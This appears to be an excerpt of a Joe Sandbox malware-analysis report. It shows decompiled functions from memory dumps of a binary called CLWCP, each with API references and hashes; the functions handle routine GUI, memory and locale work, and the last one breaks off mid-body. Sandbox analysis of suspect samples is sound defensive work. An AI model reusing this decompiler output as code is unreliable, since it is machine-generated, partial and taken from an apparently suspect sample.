                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                  • String ID:
                                  • API String ID: 3808407030-0
                                  • Opcode ID: 8936a3461feb65e48ca4021b3cb4e1951cc4dba6cc6501400b223db0571c4e37
                                  • Instruction ID: 64686e9327c25701a29f256189671e7687facbd6c337227c654a30a6c5105c60
                                  • Opcode Fuzzy Hash: 8936a3461feb65e48ca4021b3cb4e1951cc4dba6cc6501400b223db0571c4e37
                                  • Instruction Fuzzy Hash: BB419D71A04208AFDB05CFA8C895EAEB7F4FF4C314F1554AAE505973A1C7B8AD40CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044587C(int __eax, void* __edx) {
                                  				signed int _t39;
                                  				signed int _t40;
                                  				intOrPtr _t44;
                                  				int _t46;
                                  				int _t47;
                                  				intOrPtr* _t48;
                                  
                                  				_t18 = __eax;
                                  				_t48 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                  					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                  						 *((char*)(__eax + 0x74)) = 1;
                                  						return __eax;
                                  					}
                                  					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                  					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                  						return E0044587C(_t19, __edx);
                                  					}
                                  					_t18 = GetMenuItemCount(E004459AC(__eax));
                                  					_t47 = _t18;
                                  					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                  					while(_t47 > 0) {
                                  						_t46 = _t47 - 1;
                                  						_t18 = GetMenuState(E004459AC(_t48), _t46, 0x400);
                                  						if((_t18 & 0x00000004) == 0) {
                                  							_t18 = RemoveMenu(E004459AC(_t48), _t46, 0x400);
                                  							_t40 = 1;
                                  						}
                                  						_t47 = _t47 - 1;
                                  					}
                                  					if(_t40 != 0) {
                                  						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                  							L14:
                                  							E0044573C(_t48);
                                  							L15:
                                  							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                  						}
                                  						_t44 =  *0x444374; // 0x4443c0
                                  						if(E00403524( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E004459AC(_t48)) != 0) {
                                  							goto L14;
                                  						} else {
                                  							DestroyMenu( *(_t48 + 0x34));
                                  							 *(_t48 + 0x34) = 0;
                                  							goto L15;
                                  						}
                                  					}
                                  				}
                                  				return _t18;
                                  			}










                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 944ef568eef76c73b7a802f34b7c54b463d944010535fe161b9c98e8645b4c76
                                  • Instruction ID: d5d07dc8af189ccfc6548430fc742ef2699b64d7b4002300a91c988daa0df7aa
                                  • Opcode Fuzzy Hash: 944ef568eef76c73b7a802f34b7c54b463d944010535fe161b9c98e8645b4c76
                                  • Instruction Fuzzy Hash: FC115EA1705A49DBEEA0BF7A8906B5B37985F56728F44002BBC41DB393CE2CCC16865D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00455F48(void* __eax, void* __ecx, struct HWND__** __edx) {
                                  				intOrPtr _t11;
                                  				intOrPtr _t20;
                                  				void* _t30;
                                  				void* _t31;
                                  				void* _t33;
                                  				struct HWND__** _t34;
                                  				struct HWND__* _t35;
                                  				struct HWND__* _t36;
                                  
                                  				_t31 = __ecx;
                                  				_t34 = __edx;
                                  				_t33 = __eax;
                                  				_t30 = 0;
                                  				_t11 =  *((intOrPtr*)(__edx + 4));
                                  				if(_t11 < 0x100 || _t11 > 0x109) {
                                  					L16:
                                  					return _t30;
                                  				} else {
                                  					_t35 = GetCapture();
                                  					if(_t35 != 0) {
                                  						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x470664 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                  							_t30 = 1;
                                  						}
                                  						goto L16;
                                  					}
                                  					_t36 =  *_t34;
                                  					_t2 = _t33 + 0x44; // 0x74726f50
                                  					_t20 =  *_t2;
                                  					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x26c))) {
                                  						L7:
                                  						if(E004318A4(_t36, _t31) == 0 && _t36 != 0) {
                                  							_t36 = GetParent(_t36);
                                  							goto L7;
                                  						}
                                  						if(_t36 == 0) {
                                  							_t36 =  *_t34;
                                  						}
                                  						goto L11;
                                  					} else {
                                  						_t36 = E0043BA58(_t20);
                                  						L11:
                                  						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                  							_t30 = 1;
                                  						}
                                  						goto L16;
                                  					}
                                  				}
                                  			}












                                  APIs
                                  • GetCapture.USER32 ref: 00455F6B
                                  • SendMessageA.USER32(00000000,-0000BBEE,0046D588,?), ref: 00455FBF
                                  • GetWindowLongA.USER32 ref: 00455FCF
                                  • SendMessageA.USER32(00000000,-0000BBEE,0046D588,?), ref: 00455FEE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MessageSend$CaptureLongWindow
                                  • String ID:
                                  • API String ID: 1158686931-0
                                  • Opcode ID: 5f0c1b851fcf437cedb4f01f49ec5ef74a377aea664cb921dde8b8433e01b7dd
                                  • Instruction ID: cbb7f6c86aa1ac59baff1092f2a4a8e80393e24e77d09830cadcc1da95022b58
                                  • Opcode Fuzzy Hash: 5f0c1b851fcf437cedb4f01f49ec5ef74a377aea664cb921dde8b8433e01b7dd
                                  • Instruction Fuzzy Hash: 54114972204A099FD620BA5ACA50E7773DC9F1831AB10443AFE5AD3A43EA69E8144769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00423228(struct HPALETTE__* __eax) {
                                  				struct HPALETTE__* _t21;
                                  				char _t28;
                                  				signed int _t30;
                                  				struct HPALETTE__* _t36;
                                  				struct HPALETTE__* _t37;
                                  				struct HDC__* _t38;
                                  				intOrPtr _t39;
                                  
                                  				_t21 = __eax;
                                  				_t36 = __eax;
                                  				_t39 =  *((intOrPtr*)(__eax + 0x28));
                                  				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
                                  					_t22 =  *((intOrPtr*)(_t39 + 0x14));
                                  					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
                                  						E00421AAC(_t22);
                                  					}
                                  					_t21 = E0041F3DC( *((intOrPtr*)(_t39 + 0x14)), 1 << ( *(_t39 + 0x3e) & 0x0000ffff));
                                  					_t37 = _t21;
                                  					 *(_t39 + 0x10) = _t37;
                                  					if(_t37 == 0) {
                                  						_push(0);
                                  						L004066E4();
                                  						_t21 = E0041ECD4(_t21);
                                  						_t38 = _t21;
                                  						if( *((char*)(_t39 + 0x71)) != 0) {
                                  							L9:
                                  							_t28 = 1;
                                  						} else {
                                  							_push(0xc);
                                  							_push(_t38);
                                  							L0040641C();
                                  							_push(0xe);
                                  							_push(_t38);
                                  							L0040641C();
                                  							_t30 = _t21 * _t21;
                                  							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
                                  							if(_t30 < _t21) {
                                  								goto L9;
                                  							} else {
                                  								_t28 = 0;
                                  							}
                                  						}
                                  						 *((char*)(_t39 + 0x71)) = _t28;
                                  						if(_t28 != 0) {
                                  							_t21 = CreateHalftonePalette(_t38);
                                  							 *(_t39 + 0x10) = _t21;
                                  						}
                                  						_push(_t38);
                                  						_push(0);
                                  						L00406944();
                                  						if( *(_t39 + 0x10) == 0) {
                                  							 *((char*)(_t36 + 0x30)) = 1;
                                  							return _t21;
                                  						}
                                  					}
                                  				}
                                  				return _t21;
                                  			}











                                  APIs
                                  • 72E7AC50.USER32(00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042327E
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 00423293
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042329D
                                  • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232C1
                                  • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232CC
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380CreateHalftonePalette
                                  • String ID:
                                  • API String ID: 178651289-0
                                  • Opcode ID: 6e854ed13ed71c2a628e380240294d06c5e954e1823b62f5478c796d6493dab5
                                  • Instruction ID: 05c5498da4ef81f9551387c9fed782a2be801edae81ddbf7dfda4d063f5beb4d
                                  • Opcode Fuzzy Hash: 6e854ed13ed71c2a628e380240294d06c5e954e1823b62f5478c796d6493dab5
                                  • Instruction Fuzzy Hash: 6111E42070027D9AEB20DF2698417EE36E1BF51356F400067FC009A6C1D3BC9994C3B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00453174(void* __eax) {
                                  				void* _t16;
                                  				void* _t36;
                                  				void* _t37;
                                  				signed int _t39;
                                  
                                  				_t16 = __eax;
                                  				_t37 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x46ef40 != 0) {
                                  					_t16 = E0043BD58(__eax);
                                  					if(_t16 != 0) {
                                  						_t39 = GetWindowLongA(E0043BA58(_t37), 0xffffffec);
                                  						if( *(_t37 + 0x2f8) != 0 ||  *(_t37 + 0x320) != 0) {
                                  							if((_t39 & 0x00080000) == 0) {
                                  								SetWindowLongA(E0043BA58(_t37), 0xffffffec, _t39 | 0x00080000);
                                  							}
                                  							return  *0x46ef40(E0043BA58(_t37),  *((intOrPtr*)(_t37 + 0x324)),  *(_t37 + 0x2f9) & 0x000000ff,  *(0x46efc8 + ( *(_t37 + 0x2f8) & 0x000000ff) * 4) |  *(0x46efd0 + ( *(_t37 + 0x320) & 0x000000ff) * 4));
                                  						} else {
                                  							SetWindowLongA(E0043BA58(_t37), 0xffffffec, _t39 & 0xfff7ffff);
                                  							_push(0x485);
                                  							_push(0);
                                  							_push(0);
                                  							_t36 = E0043BA58(_t37);
                                  							_push(_t36);
                                  							L0040691C();
                                  							return _t36;
                                  						}
                                  					}
                                  				}
                                  				return _t16;
                                  			}








                                  APIs
                                  • GetWindowLongA.USER32 ref: 004531A8
                                  • SetWindowLongA.USER32 ref: 004531DA
                                  • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,00450A2C), ref: 00453213
                                  • SetWindowLongA.USER32 ref: 0045322C
                                  • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,00450A2C), ref: 00453242
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Long$AttributesB330Layered
                                  • String ID:
                                  • API String ID: 1770052509-0
                                  • Opcode ID: 46af30b256d10928f437a375ba999643719cd7d125cefb34eec97b120bcdc70a
                                  • Instruction ID: 3a13c55cf621c012d4a2d550bd8b4b19c68f6e4fc2cde6b4230db6698efac5e2
                                  • Opcode Fuzzy Hash: 46af30b256d10928f437a375ba999643719cd7d125cefb34eec97b120bcdc70a
                                  • Instruction Fuzzy Hash: F011E760A4069426CB10BF7A4C49F5726CC4B05356F0825BBBEA1EA2D7C77CCA08C76C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 40%
                                  			E0041F344(intOrPtr __eax) {
                                  				signed int _v5;
                                  				intOrPtr _v12;
                                  				intOrPtr _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t21;
                                  				intOrPtr _t30;
                                  				void* _t32;
                                  				void* _t34;
                                  				intOrPtr _t35;
                                  
                                  				_t32 = _t34;
                                  				_t35 = _t34 + 0xfffffff8;
                                  				_v5 = 0;
                                  				if( *0x470898 == 0) {
                                  					return _v5 & 0x000000ff;
                                  				} else {
                                  					_push(0);
                                  					L004066E4();
                                  					_v12 = __eax;
                                  					_push(_t32);
                                  					_push(0x41f3ca);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t35;
                                  					_push(0x68);
                                  					_t14 = _v12;
                                  					_push(_t14);
                                  					L0040641C();
                                  					if(_t14 >= 0x10) {
                                  						_push(__eax + 4);
                                  						_push(8);
                                  						_push(0);
                                  						_t18 =  *0x470898; // 0xad0807a3
                                  						_push(_t18);
                                  						L00406444();
                                  						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
                                  						_push(8);
                                  						_push(8);
                                  						_t21 =  *0x470898; // 0xad0807a3
                                  						_push(_t21);
                                  						L00406444();
                                  						_v5 = 1;
                                  					}
                                  					_pop(_t30);
                                  					 *[fs:eax] = _t30;
                                  					_push(0x41f3d1);
                                  					_t16 = _v12;
                                  					_push(_t16);
                                  					_push(0);
                                  					L00406944();
                                  					return _t16;
                                  				}
                                  			}














                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041F35C
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041F3CA,?,00000000), ref: 0041F378
                                  • 72E7AEA0.GDI32(AD0807A3,00000000,00000008,?,?,00000068,00000000,0041F3CA,?,00000000), ref: 0041F390
                                  • 72E7AEA0.GDI32(AD0807A3,00000008,00000008,?,AD0807A3,00000000,00000008,?,?,00000068,00000000,0041F3CA,?,00000000), ref: 0041F3A8
                                  • 72E7B380.USER32(00000000,?,0041F3D1,0041F3CA,?,00000000), ref: 0041F3C4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: 5cc94371afd07242a5cd37eb12ce28cad48156c70d0025018c65f4ef2f0e638c
                                  • Instruction ID: 408ce5b6f06ab2824a8670db9625c87be0020e604698115877b74bfe2a6c2a2d
                                  • Opcode Fuzzy Hash: 5cc94371afd07242a5cd37eb12ce28cad48156c70d0025018c65f4ef2f0e638c
                                  • Instruction Fuzzy Hash: 63112B71548308BEFB40EBA59C42FAD77E8E704704F514077F908DA1C1D97A9494C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00401AE2() {
                                  				void* _t2;
                                  				void* _t4;
                                  				intOrPtr* _t20;
                                  				void* _t21;
                                  				intOrPtr _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t28;
                                  
                                  				_t26 = _t28;
                                  				if( *0x4705c0 == 0) {
                                  					return _t2;
                                  				} else {
                                  					_push(_t26);
                                  					_push(E00401BBB);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t28;
                                  					if( *0x470049 != 0) {
                                  						_push(0x4705c8);
                                  						L00401370();
                                  					}
                                  					 *0x4705c0 = 0;
                                  					_t4 =  *0x470620; // 0x0
                                  					LocalFree(_t4);
                                  					 *0x470620 = 0;
                                  					_t20 =  *0x4705e8; // 0x4705e8
                                  					while(_t20 != 0x4705e8) {
                                  						_t1 = _t20 + 8; // 0x0
                                  						VirtualFree( *_t1, 0, 0x8000); // executed
                                  						_t20 =  *_t20;
                                  					}
                                  					E004013D8(0x4705e8);
                                  					E004013D8(0x4705f8);
                                  					E004013D8(0x470624);
                                  					_t21 =  *0x4705e0; // 0x0
                                  					while(_t21 != 0) {
                                  						 *0x4705e0 =  *_t21;
                                  						LocalFree(_t21);
                                  						_t21 =  *0x4705e0; // 0x0
                                  					}
                                  					_pop(_t24);
                                  					 *[fs:eax] = _t24;
                                  					_push(0x401bc2);
                                  					if( *0x470049 != 0) {
                                  						_push(0x4705c8);
                                  						L00401378();
                                  					}
                                  					_push(0x4705c8);
                                  					L00401380();
                                  					return 0;
                                  				}
                                  			}











                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(Function_000705C8,00000000,00401BBB), ref: 00401B11
                                  • LocalFree.KERNEL32(00000000,00000000,00401BBB), ref: 00401B23
                                  • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401BBB), ref: 00401B81
                                  • RtlLeaveCriticalSection.KERNEL32(Function_000705C8,00401BC2,00000000,00000000,00401BBB), ref: 00401BAB
                                  • RtlDeleteCriticalSection.KERNEL32(Function_000705C8,00401BC2,00000000,00000000,00401BBB), ref: 00401BB5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$FreeLocal$DeleteEnterLeave
                                  • String ID:
                                  • API String ID: 3902855382-0
                                  • Opcode ID: 48ee725851277193807bdf0938f6986b267f5597e0e8a36e4393d27bd0db0dad
                                  • Instruction ID: dd12b175061bed6b72c62c504acc70ab66a8c779eff7002d0090a30e7966d8d3
                                  • Opcode Fuzzy Hash: 48ee725851277193807bdf0938f6986b267f5597e0e8a36e4393d27bd0db0dad
                                  • Instruction Fuzzy Hash: 56117770202740EEE351EB759851F3A36E4E346744F44447BF808E66F2E77C68948B1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E0040B2F4(void* __esi, void* __eflags) {
                                  				char _v8;
                                  				intOrPtr* _t18;
                                  				intOrPtr _t26;
                                  				void* _t27;
                                  				long _t29;
                                  				intOrPtr _t32;
                                  				void* _t33;
                                  
                                  				_t33 = __eflags;
                                  				_push(0);
                                  				_push(_t32);
                                  				_push(0x40b38b);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32;
                                  				E0040B068(GetThreadLocale(), 0x40b3a0, 0x100b,  &_v8);
                                  				_t29 = E004081CC(0x40b3a0, 1, _t33);
                                  				if(_t29 + 0xfffffffd - 3 < 0) {
                                  					EnumCalendarInfoA(E0040B240, GetThreadLocale(), _t29, 4);
                                  					_t27 = 7;
                                  					_t18 = 0x470770;
                                  					do {
                                  						 *_t18 = 0xffffffff;
                                  						_t18 = _t18 + 4;
                                  						_t27 = _t27 - 1;
                                  					} while (_t27 != 0);
                                  					EnumCalendarInfoA(E0040B27C, GetThreadLocale(), _t29, 3);
                                  				}
                                  				_pop(_t26);
                                  				 *[fs:eax] = _t26;
                                  				_push(E0040B392);
                                  				return E0040411C( &_v8);
                                  			}










                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040B38B,?,?,00000000), ref: 0040B30C
                                    • Part of subcall function 0040B068: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B086
                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040B38B,?,?,00000000), ref: 0040B33C
                                  • EnumCalendarInfoA.KERNEL32(Function_0000B240,00000000,00000000,00000004), ref: 0040B347
                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040B38B,?,?,00000000), ref: 0040B365
                                  • EnumCalendarInfoA.KERNEL32(Function_0000B27C,00000000,00000000,00000003), ref: 0040B370
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread$CalendarEnum
                                  • String ID:
                                  • API String ID: 4102113445-0
                                  • Opcode ID: 1a89d55a44ce401da377dd60727b147840757dd13d4b5760ad4393d30002e4ba
                                  • Instruction ID: 28b47b87a12a2f32c5302e84a0ad6bb1544b038fd0184ab3c0a089a6ca06129f
                                  • Opcode Fuzzy Hash: 1a89d55a44ce401da377dd60727b147840757dd13d4b5760ad4393d30002e4ba
                                  • Instruction Fuzzy Hash: FF01DF31240604BAE301B6719C13F5F7658DB46B18F7289BAF901BA6D2E73D9E0082EC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004548A0() {
                                  				void* _t2;
                                  				void* _t5;
                                  				void* _t8;
                                  				struct HHOOK__* _t10;
                                  
                                  				if( *0x470b58 != 0) {
                                  					_t10 =  *0x470b58; // 0x0
                                  					UnhookWindowsHookEx(_t10);
                                  				}
                                  				 *0x470b58 = 0;
                                  				if( *0x470b5c != 0) {
                                  					_t2 =  *0x470b54; // 0x0
                                  					SetEvent(_t2);
                                  					if(GetCurrentThreadId() !=  *0x470b50) {
                                  						_t8 =  *0x470b5c; // 0x0
                                  						WaitForSingleObject(_t8, 0xffffffff);
                                  					}
                                  					_t5 =  *0x470b5c; // 0x0
                                  					CloseHandle(_t5);
                                  					 *0x470b5c = 0;
                                  					return 0;
                                  				}
                                  				return 0;
                                  			}







                                  APIs
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 004548AF
                                  • SetEvent.KERNEL32(00000000,004572BA,00000000,0045602B,?,?,0046D588,00000001,004561F1,?,00000000,00000000,00000000,00000001), ref: 004548CA
                                  • GetCurrentThreadId.KERNEL32 ref: 004548CF
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,004572BA,00000000,0045602B,?,?,0046D588,00000001,004561F1,?,00000000,00000000,00000000,00000001), ref: 004548E4
                                  • CloseHandle.KERNEL32(00000000,00000000,004572BA,00000000,0045602B,?,?,0046D588,00000001,004561F1,?,00000000,00000000,00000000,00000001), ref: 004548EF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                  • String ID:
                                  • API String ID: 2429646606-0
                                  • Opcode ID: 5967a147c784134102ea08d2c72e70a935c400af97a33273f65cc66d8d33174d
                                  • Instruction ID: ea1422286a5aaf1ad6debeb8b6b68ba5197bd7197b5f5b6af5719e73bb46d06f
                                  • Opcode Fuzzy Hash: 5967a147c784134102ea08d2c72e70a935c400af97a33273f65cc66d8d33174d
                                  • Instruction Fuzzy Hash: 30F01C74602280DEC650FBF9DC89A0533A5A70430DB1004BAB019FB2E2C63CF6D4CB2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0045753C(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				struct HWND__* _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				struct tagRECT _v48;
                                  				intOrPtr _v52;
                                  				intOrPtr _v56;
                                  				int _v60;
                                  				int _v64;
                                  				intOrPtr _v68;
                                  				char _v72;
                                  				int _v76;
                                  				char _v80;
                                  				intOrPtr _v84;
                                  				intOrPtr _v88;
                                  				struct tagPOINT _v96;
                                  				char _v97;
                                  				struct tagRECT _v113;
                                  				char _v132;
                                  				intOrPtr _v136;
                                  				char _v140;
                                  				char _v144;
                                  				char _v148;
                                  				struct HWND__* _t131;
                                  				void* _t145;
                                  				struct HWND__* _t167;
                                  				intOrPtr _t188;
                                  				char _t194;
                                  				intOrPtr _t218;
                                  				intOrPtr _t222;
                                  				void* _t238;
                                  				intOrPtr* _t250;
                                  				intOrPtr _t269;
                                  				intOrPtr _t271;
                                  				intOrPtr _t276;
                                  				struct tagRECT* _t298;
                                  				intOrPtr* _t302;
                                  				intOrPtr _t303;
                                  				void* _t310;
                                  
                                  				_t309 = _t310;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t251 = 0;
                                  				_v144 = 0;
                                  				_v148 = 0;
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_v8 = __eax;
                                  				_t268 =  *0x44c2e4; // 0x44c2e8
                                  				E00404A88( &_v72, _t268);
                                  				_t250 =  &_v8;
                                  				_push(_t310);
                                  				_push(0x4578c3);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t310 + 0xffffff70;
                                  				 *((char*)( *_t250 + 0x58)) = 0;
                                  				_v24 = 0;
                                  				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E0044C6E0() == 0) {
                                  					L23:
                                  					_t131 = _v24;
                                  					__eflags = _t131;
                                  					if(_t131 <= 0) {
                                  						E0045729C( *_t250, _t251, _t268);
                                  					} else {
                                  						E00457064( *_t250, 0, _t131);
                                  					}
                                  					goto L26;
                                  				} else {
                                  					_t145 = E00454718(E0043334C( &_v80, 1));
                                  					_t268 =  *_t250;
                                  					if(_t145 !=  *((intOrPtr*)( *_t250 + 0x60))) {
                                  						goto L23;
                                  					} else {
                                  						_v72 =  *((intOrPtr*)( *_t250 + 0x60));
                                  						_v64 = _v80;
                                  						_v60 = _v76;
                                  						_v60 = _v60 + E004572D4(__fp0);
                                  						_v56 = E00453A88();
                                  						_v52 =  *((intOrPtr*)( *_t250 + 0x5c));
                                  						E0043452C( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
                                  						_t298 =  &_v48;
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
                                  						_v96.x = 0;
                                  						_v96.y = 0;
                                  						_t302 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
                                  						_t316 = _t302;
                                  						if(_t302 == 0) {
                                  							_t303 =  *((intOrPtr*)( *_t250 + 0x60));
                                  							_t276 =  *0x4309d0; // 0x430a1c
                                  							_t167 = E00403524(_t303, _t276);
                                  							__eflags = _t167;
                                  							if(_t167 != 0) {
                                  								__eflags =  *(_t303 + 0x198);
                                  								if( *(_t303 + 0x198) != 0) {
                                  									ClientToScreen( *(_t303 + 0x198),  &_v96);
                                  								}
                                  							}
                                  						} else {
                                  							 *((intOrPtr*)( *_t302 + 0x40))();
                                  						}
                                  						OffsetRect( &_v48, _v96.x - _v88, _v96.y - _v84);
                                  						E004346D0( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v80);
                                  						_v32 = _v140;
                                  						_v28 = _v136;
                                  						E004546E0( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
                                  						E00431AE4(_v148,  &_v140,  &_v144, _t316);
                                  						E004041B4( &_v16, _v144);
